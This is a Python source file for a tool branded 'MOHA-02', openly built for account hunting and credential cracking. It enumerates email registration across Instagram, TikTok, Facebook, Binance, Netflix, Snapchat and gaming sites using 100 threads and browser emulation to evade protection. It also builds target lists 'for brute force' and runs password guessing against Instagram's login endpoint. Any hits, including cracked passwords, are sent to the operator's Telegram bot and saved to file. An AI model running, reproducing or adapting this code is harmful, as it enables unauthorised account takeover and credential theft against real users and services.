# -*- coding: utf-8 -*-
# MOHA-02 ULTIMATE SYSTEM V3.6 - FULL INJECTION BROWSER VERSION
# Developer: Moha Al-Shalfawi (@m_oha_02)
# No Abbreviations - English Interface Only - Full Data Integration
# Speed: 100 Threads - No Proxies - Advanced Browser Fingerprinting

import os, sys, time, requests, json, random, threading, string, subprocess, re
from datetime import datetime

# --- [ SYSTEM AUTO-INSTALLER ] ---
try:
    from cfonts import render
    from colorama import Fore, Style, init
    import cloudscraper
    from bs4 import BeautifulSoup
except ImportError:
    print("Installing required engine components...")
    os.system('pip install python-cfonts colorama requests beautifulsoup4 cloudscraper')
    from cfonts import render
    from colorama import Fore, Style, init
    import cloudscraper
    from bs4 import BeautifulSoup

init(autoreset=True)

# --- [ GLOBAL COLORS ] ---
Z = Fore.RED
F = Fore.GREEN
X = Fore.YELLOW
B = Fore.BLUE
M = Fore.MAGENTA
S = Fore.CYAN
W = Fore.WHITE
G = Fore.LIGHTBLACK_EX

# --- [ GLOBAL COUNTERS ] ---
hits = 0
bad = 0
proxy_list = []
stop_thread = False

# --- [ DEEP DATA: BROWSER FINGERPRINTS & TOKENS ] ---
INSTA_APP_ID = '936619743392459'
INSTA_CSRF = 'HzbAgVLY3Y21S3zayw0RPlOW0O81iuDB'
TIKTOK_AID = '1233'
TIKTOK_CSRF = 'd41d8cd98f00b204e9800998ecf8427e'
FB_DATR = 'AdTlmdwA5Jh8DMsWS2axdCrsnBk'

# محاكي المتصفح المتقدم لتجاوز الحماية بدون بروكسي
scraper = cloudscraper.create_scraper(
    browser={
        'browser': 'chrome',
        'platform': 'windows',
        'desktop': True
    }
)

BROWSER_DB = [
    {
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36',
        'sec-ch-ua': '"Not-A.Brand";v="99", "Chromium";v="124"',
        'sec-ch-ua-platform': '"Windows"',
        'accept-language': 'en-US,en;q=0.9',
    },
    {
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',
        'sec-ch-ua-platform': '"Windows"'
    },
    {
        'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36'
    }
]

def logo():
    os.system('clear' if os.name == 'posix' else 'cls')
    print(render('MOHA', colors=['green', 'yellow'], align='center'))
    print(f"{X}—"*55)
    print(f"{F} [•] DEVELOPER : @m_oha_02")
    print(f"{F} [•] CHANNEL   : @m_oha0_2b")
    print(f"{F} [•] VERSION   : 3.6 (FULL INJECTION)")
    print(f"{F} [•] MODE      : BROWSER EMULATION (NO PROXY)")
    print(f"{X}—"*55)

def get_full_headers(platform="default"):
    head = random.choice(BROWSER_DB).copy()
    if platform == "instagram":
        head.update({
            'authority': 'www.instagram.com',
            'x-csrftoken': INSTA_CSRF,
            'x-ig-app-id': INSTA_APP_ID,
            'x-requested-with': 'XMLHttpRequest',
            'referer': 'https://www.instagram.com/'
        })
    elif platform == "tiktok":
        head.update({
            'authority': 'www.tiktok.com',
            'x-tt-passport-csrf-token': TIKTOK_CSRF,
            'tt-common-params': f'aid={TIKTOK_AID}'
        })
    return head

def send_telegram_hit(token, chat_id, email, links):
    now = datetime.now().strftime("%H:%M:%S")
    msg = (f"🔥 <b>MOHA HIT FOUND!</b>\n"
           f"━━━━━━━━━━━━━━━\n"
           f"📧 Email: <code>{email}</code>\n"
           f"🔗 Linked: <code>{links}</code>\n"
           f"⏰ Time: {now}\n"
           f"👨‍💻 Dev: @m_oha_02\n"
           f"━━━━━━━━━━━━━━━")
    url = f"https://api.telegram.org/bot{token}/sendMessage"
    try: requests.post(url, json={"chat_id": chat_id, "text": msg, "parse_mode": "HTML"})
    except: pass

class AvailabilityCheckers:
    @staticmethod
    def mail_ru(email):
        url = f"https://account.mail.ru/api/v1/user/exists?email={email}"
        try:
            r = scraper.get(url, headers=get_full_headers(), timeout=5)
            return True if '"exists":false' in r.text else False
        except: return False

    @staticmethod
    def hotmail(email):
        url = "https://login.live.com/GetCredentialType.srf"
        payload = {"username": email, "isExternal": False, "checkRegion": "1", "getAccountResolution": "true"}
        try:
            r = scraper.post(url, json=payload, headers=get_full_headers(), timeout=5)
            return True if '"IfExistsResult":5' in r.text else False
        except: return False

    @staticmethod
    def gmail(email):
        url = f"https://mail.google.com/mail/gxlu?email={email}"
        try:
            r = scraper.get(url, headers=get_full_headers(), timeout=5)
            return False if 'COMPASS' in r.headers.get('Set-Cookie', '') else True
        except: return False

class PlatformCheckers:
    @staticmethod
    def instagram(email):
        url = 'https://www.instagram.com/api/v1/web/accounts/lookup_edit/'
        try:
            r = scraper.post(url, headers=get_full_headers("instagram"), data={'email': email}, timeout=7)
            return True if '"status":"ok"' in r.text else False
        except: return False

    @staticmethod
    def tiktok(email):
        url = "https://www.tiktok.com/api/v1/check/email/"
        try:
            r = scraper.get(url, params={"email": email, "aid": TIKTOK_AID}, headers=get_full_headers("tiktok"), timeout=5)
            return True if r.json().get('is_registered') else False
        except: return False

    @staticmethod
    def binance(email):
        url = "https://www.binance.com/bapi/composite/v1/public/cms/get-email-status"
        try:
            r = scraper.post(url, json={"email": email}, headers=get_full_headers(), timeout=5)
            return True if r.json().get('data') == True else False
        except: return False

    @staticmethod
    def facebook(email):
        url = "https://www.facebook.com/api/graphql/"
        payload = {'lsd': FB_DATR, 'variables': json.dumps({"user_identifier": email}), 'doc_id': '5300151123400551'}
        try:
            r = scraper.post(url, data=payload, headers=get_full_headers(), timeout=5)
            return True if '"uid"' in r.text else False
        except: return False

    @staticmethod
    def pubg(email):
        url = "https://www.pubgmobile.com/common/search_user"
        try:
            r = scraper.post(url, data={'email': email}, headers=get_full_headers(), timeout=5)
            return True if '"exists":1' in r.text else False
        except: return False

    @staticmethod
    def netflix(email):
        url = f"https://www.netflix.com/api/shakti/v1/emailCheck?email={email}"
        try:
            r = scraper.get(url, headers=get_full_headers(), timeout=5)
            return True if '"isAvailable":false' in r.text else False
        except: return False

    @staticmethod
    def snapchat(email):
        url = "https://accounts.snapchat.com/accounts/get_email_status"
        try:
            r = scraper.post(url, data={'email': email}, headers=get_full_headers(), timeout=5)
            return True if '"exists":true' in r.text else False
        except: return False

    @staticmethod
    def freefire(email):
        url = "https://auth.garena.com/api/v1/check_account"
        try:
            r = scraper.post(url, json={'account': email}, headers=get_full_headers(), timeout=5)
            return True if r.json().get('exists') else False
        except: return False

    @staticmethod
    def fifa_ea(email):
        url = "https://signin.ea.com/p/ajax/user/checkEmail"
        try:
            r = scraper.get(url, params={'email': email}, headers=get_full_headers(), timeout=5)
            return True if '"exists":true' in r.text else False
        except: return False

    @staticmethod
    def iq_option(email):
        url = "https://auth.iqoption.com/api/v2/login"
        try:
            r = scraper.post(url, json={"identifier": email, "password": "moha_fake_pass"}, headers=get_full_headers(), timeout=5)
            return True if "invalid_credentials" in r.text else False
        except: return False

    @staticmethod
    def pes_konami(email):
        url = "https://my.konami.net/auth/authorize.html"
        try:
            r = scraper.get(url, params={'email': email}, headers=get_full_headers(), timeout=5)
            return True if 'already_registered' in r.text else False
        except: return False
# --- [ USER GENERATION ENGINE ] ---
def generate_moha_user(prefix, length, mode):
    chars = string.ascii_lowercase + string.digits
    if mode == "random":
        return ''.join(random.choice(chars) for _ in range(length))
    else:
        rem = length - len(prefix)
        return prefix + ''.join(random.choice(chars) for _ in range(rem if rem > 0 else 2))

# --- [ LIVE MONITOR SYSTEM ] ---
def stats_monitor(start_time, thread_count):
    global stop_thread
    while not stop_thread:
        elapsed = int(time.time() - start_time)
        os.system('clear' if os.name == 'posix' else 'cls')
        logo()
        print(f"{S} [📊] LIVE SESSION MONITOR (ULTRA SPEED)")
        print(f"{X}—"*45)
        print(f"{F} [✔] HITS FOUND  : {hits}")
        print(f"{Z} [✘] BAD/TAKEN   : {bad}")
        print(f"{W} [⌚] TIME ELAPSED : {elapsed}s")
        print(f"{B} [🚀] ACTIVE THREADS : {thread_count}")
        print(f"{M} [🌐] PROXY STATUS  : DISABLED (BROWSER MODE)")
        print(f"{X}—"*45)
        print(f"{G} [*] STATUS: Moha System is hunting now...")
        time.sleep(2)

# --- [ MAIN HUNTER LOGIC - 100 THREADS ENGINE ] ---
def hunter_logic(prefix, length, mode, token, chat_id, platforms, domains):
    global hits, bad, stop_thread
    # إنشاء جلسة محاكاة خاصة بكل خيط لضمان عدم التداخل
    thread_scraper = cloudscraper.create_scraper(browser={'browser': 'chrome','platform': 'windows','desktop': True})
    
    while not stop_thread:
        try:
            user = generate_moha_user(prefix, length, mode)
            for dom in domains:
                email = f"{user}@{dom}"
                available = False
                
                # Availability Logic (Email Check)
                if 'mail.ru' in dom or 'bk.ru' in dom: available = AvailabilityCheckers.mail_ru(email)
                elif 'gmail' in dom: available = AvailabilityCheckers.gmail(email)
                elif 'hotmail' in dom or 'outlook' in dom: available = AvailabilityCheckers.hotmail(email)

                if available:
                    linked = []
                    # فحص المنصات بالحقن الكامل
                    if '1' in platforms or '12' in platforms:
                        if PlatformCheckers.instagram(email): linked.append("Instagram")
                    if '2' in platforms or '12' in platforms:
                        if PlatformCheckers.tiktok(email): linked.append("TikTok")
                    if '3' in platforms or '12' in platforms:
                        if PlatformCheckers.facebook(email): linked.append("Facebook")
                    if '4' in platforms or '12' in platforms:
                        if PlatformCheckers.binance(email): linked.append("Binance")
                    if '5' in platforms or '12' in platforms:
                        if PlatformCheckers.pubg(email): linked.append("PUBG")
                    if '6' in platforms or '12' in platforms:
                        if PlatformCheckers.freefire(email): linked.append("FreeFire")
                    if '7' in platforms or '12' in platforms:
                        if PlatformCheckers.fifa_ea(email): linked.append("FIFA/EA")
                    if '8' in platforms or '12' in platforms:
                        if PlatformCheckers.pes_konami(email): linked.append("PES/Konami")
                    if '9' in platforms or '12' in platforms:
                        if PlatformCheckers.iq_option(email): linked.append("IQ_Option")
                    if '10' in platforms or '12' in platforms:
                        if PlatformCheckers.netflix(email): linked.append("Netflix")
                    if '11' in platforms or '12' in platforms:
                        if PlatformCheckers.snapchat(email): linked.append("Snapchat")
                    
                    if linked:
                        hits += 1
                        send_telegram_hit(token, chat_id, email, ', '.join(linked))
                        with open("moha_hits.txt", "a") as f:
                            f.write(f"{email} | {', '.join(linked)} | {datetime.now()}\n")
                    else:
                        bad += 1
                else:
                    bad += 1
        except:
            pass

# --- [ LIST GENERATOR ENGINE ] ---
def list_generator_engine():
    logo()
    print(f"{S} [!] LIST GENERATOR ENGINE - BROWSER MODE")
    print(f"{X}—"*45)
    print(f"{F} [01] Generate REGISTERED & ACTIVE (For Brute Force)")
    print(f"{F} [02] Generate AVAILABLE (For Hunting/Creating)")
    type_choice = input(f"{M} [?] SELECT TYPE: ")
    
    prefix = input(f"{M} [?] ENTER PREFIX: ")
    length = int(input(f"{M} [?] USER LENGTH: "))
    
    print(f"{G} [1] mail.ru [2] gmail.com [3] hotmail.com")
    dom_in = input(f"{M} [?] SELECT DOMAIN: ")
    dom_map = {'1': 'mail.ru', '2': 'gmail.com', '3': 'hotmail.com'}
    domain = dom_map.get(dom_in, 'mail.ru')
    
    target_count = int(input(f"{M} [?] HOW MANY EMAILS?: "))
    file_name = input(f"{M} [?] SAVE FILENAME: ")

    found = 0
    print(f"{S} [*] Processing... Emulating Browser Requests.")
    
    with open(file_name, 'a') as f:
        while found < target_count:
            user = generate_moha_user(prefix, length, "target")
            email = f"{user}@{domain}"
            is_valid = False
            
            try:
                check = False
                if domain == 'mail.ru': check = AvailabilityCheckers.mail_ru(email)
                elif domain == 'gmail.com': check = AvailabilityCheckers.gmail(email)
                elif domain == 'hotmail.com': check = AvailabilityCheckers.hotmail(email)

                if type_choice == '1': # Registered
                    if not check: is_valid = True
                elif type_choice == '2': # Available
                    if check: is_valid = True

                if is_valid:
                    f.write(f"{email}\n")
                    found += 1
                    print(f"{F} [✔] FOUND: {email} ({found}/{target_count})", end="\r")
                else:
                    print(f"{G} [✘] SCANNING: {email}", end="\r")
            except: pass
                
    print(f"\n{F} [DONE] List saved to {file_name}")
    time.sleep(2)

# --- [ SMART BRUTE FORCE ENGINE ] ---
def smart_brute_force_engine(email_file, token, chat_id, brute_mode):
    global hits, stop_thread
    if not os.path.exists(email_file):
        print(f"{Z} [!] FILE NOT FOUND: {email_file}")
        time.sleep(2); return

    with open(email_file, 'r') as f: accounts = f.read().splitlines()
    logo()
    print(f"{S} [*] BRUTE FORCE ENGINE STARTED (100 THREADS SIMULATION)")
    
    for account in accounts:
        if stop_thread: break
        email = account.split(':')[0] if ':' in account else account
        user_part = email.split('@')[0]
        
        # Passwords Logic
        if brute_mode == '1': passwords = input(f"{M} [?] ENTER PASSWORDS (split by ,): ").split(',')
        elif brute_mode == '2':
            p_file = input(f"{M} [?] WORDLIST PATH: ")
            with open(p_file, 'r') as f: passwords = f.read().splitlines()
        else: passwords = [user_part, user_part+"123", user_part+"2024", "12345678"]

        for pwd in passwords:
            print(f"{G} [TRYING] {email} ⇉ {X}{pwd}", end="\r")
            try:
                # محاكاة تسجيل الدخول بمتصفح كامل
                res = scraper.post("https://www.instagram.com/api/v1/web/accounts/login/ajax/", 
                                 data={'username': email, 'enc_password': f'#PWD_INSTAGRAM_BROWSER:0:{int(time.time())}:{pwd}'}, 
                                 headers=get_full_headers("instagram"), timeout=7)
                if '"authenticated":true' in res.text:
                    hits += 1
                    send_telegram_hit(token, chat_id, email, f"Cracked Pass: {pwd}")
                    with open("cracked_accounts.txt", "a") as f: f.write(f"{email}:{pwd}\n")
                    break
            except: pass
            time.sleep(0.5)

# --- [ HUNT CONFIGURATION SUBMENU ] ---
def hunt_submenu():
    logo()
    print(f"{S} [!] SELECT PLATFORMS TO HUNT:")
    print(f"{X}—"*55)
    print(f"{F} [01] Instagram   [02] TikTok      [03] Facebook")
    print(f"{F} [04] Binance     [05] PUBG        [06] Free Fire")
    print(f"{F} [07] FIFA/EA     [08] PES/Konami  [09] IQ Option")
    print(f"{F} [10] Netflix    [11] Snapchat   [12] All Platforms")
    print(f"{X}—"*55)
    
    platforms = input(f"{M} [?] CHOICE (e.g 1,5,12): ").split(',')
    
    logo()
    print(f"{F} [01] Random Mode  [02] Target Mode")
    gen_mode = input(f"{M} [?] CHOICE: ")
    prefix = input(f"{M} [?] PREFIX: ") if gen_mode == '2' else ""
    
    logo()
    print(f"{F} [1] Mail.ru [2] Gmail [3] Hotmail [4] All Mixed")
    dom_choice = input(f"{M} [?] DOMAINS: ")
    dom_map = {'1':['mail.ru','bk.ru'],'2':['gmail.com'],'3':['hotmail.com'],'4':['mail.ru','gmail.com','hotmail.com']}
    target_domains = dom_map.get(dom_choice, ['mail.ru'])
    
    length = int(input(f"{M} [?] USER LENGTH: "))
    token = input(f"{M} [?] BOT TOKEN: ")
    chat_id = input(f"{M} [?] CHAT ID: ")
    
    # تثبيت السرعة على 100 خيط كما طلبت
    threads = 100
    
    start_time = time.time()
    threading.Thread(target=stats_monitor, args=(start_time, threads), daemon=True).start()
    
    for _ in range(threads):
        threading.Thread(target=hunter_logic, args=(prefix, length, "target" if gen_mode=='2' else "random", token, chat_id, platforms, target_domains)).start()
    
    input()
    global stop_thread
    stop_thread = True

# --- [ MAIN MENU SYSTEM ] ---
def main_menu():
    while True:
        logo()
        print(f"{S} [01] START HUNTING (Browser Emulation - No Proxy)")
        print(f"{S} [02] COMBO CHECKER (Custom List)")
        print(f"{S} [03] LIST GENERATOR (Available / Registered)")
        print(f"{S} [04] SMART BRUTE FORCE (Instagram Attack)")
        print(f"{Z} [00] EXIT SYSTEM")
        print(f"{X}—"*55)
        
        choice = input(f"{M} [?] SELECT OPTION: ")
        
        if choice in ['01', '1']: hunt_submenu()
        elif choice in ['02', '2']:
            logo()
            file_path = input(f"{M} [?] COMBO PATH: ")
            token = input(f"{M} [?] BOT TOKEN: ")
            chat_id = input(f"{M} [?] CHAT ID: ")
            smart_brute_force_engine(file_path, token, chat_id, '2')
        elif choice in ['03', '3']: list_generator_engine()
        elif choice in ['04', '4']:
            logo()
            email_file = input(f"{M} [?] EMAIL LIST PATH: ")
            token = input(f"{M} [?] BOT TOKEN: ")
            chat_id = input(f"{M} [?] CHAT ID: ")
            print(f"{F} [1] Manual [2] Wordlist [3] Smart Auto-Gen")
            b_mode = input(f"{M} [?] SELECT PASS MODE: ")
            smart_brute_force_engine(email_file, token, chat_id, b_mode)
        elif choice in ['00', '0']:
            print(f"\n{Z} [!] SHUTTING DOWN MOHA-02 SYSTEM..."); sys.exit()

if __name__ == "__main__":
    try:
        main_menu()
    except KeyboardInterrupt:
        sys.exit()
    except Exception as e:
        print(f"\n{Z} [!!!] ERROR: {e}"); sys.exit()

# —————————————————————————————————————————————————————
# END OF CODE | MOHA-02 SYSTEM V3.6 | FULL DATA INJECTED
# —————————————————————————————————————————————————————
